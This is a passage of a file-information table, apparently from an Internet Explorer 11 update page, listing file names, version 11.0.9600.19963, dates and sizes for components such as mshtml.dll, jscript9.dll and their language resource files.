\nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 3,072 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 15,506,944 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 19:05| 615,936 \nieframe.ptxml| Not versioned| 12-Feb-2021| 16:23| 24,486 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:40| 492,032 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:46| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:47| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:48| 526,294 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:49| 499,654 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:50| 552,337 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:50| 944,559 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:48| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:51| 543,946 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:52| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:53| 526,557 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:54| 575,838 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:54| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:55| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:56| 570,737 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:57| 548,119 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:58| 639,271 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:59| 525,504 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:59| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:00| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:01| 488,488 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:02| 548,494 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:03| 559,343 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:03| 535,067 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:04| 541,455 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:05| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:06| 804,470 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:07| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:07| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:08| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:09| 503,909 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:10| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:10| 521,583 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:11| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:13| 420,082 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:13| 436,651 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:14| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.19963| 12-Feb-2021| 18:56| 970,752 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 16,896 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 19:04| 5,499,904 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:04| 785,408 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:15| 581,120 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 11:46| 810,376 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:11| 1,155,584 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 18:59| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:26| 3,228 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 47,616 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 18:37| 115,712 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 30,720 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 62,464 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:30| 16,303 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 476,160 \nie9props.propdesc| Not versioned| 23-Sep-2018| 6:32| 2,843 \nwow64_ieframe.ptxml| Not versioned| 12-Feb-2021| 16:26| 24,486 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 31,744 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 39,424 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 32,768 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 37,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 38,400 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 30,720 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 25,600 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 24,576 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 20,992 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,592 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 56,320 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 57,856 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 49,664 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 55,296 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,424 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 35,840 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 53,760 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 10,752 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 307,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 293,888 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 290,304 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 282,112 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 283,648 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 291,840 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 299,520 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 275,968 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 293,376 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 258,048 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 256,512 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 288,256 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 285,184 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 297,472 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 288,768 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 286,208 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 281,600 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 286,720 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 292,352 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 242,176 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 243,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,080 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,712 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 54,272 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,936 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 39,424 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 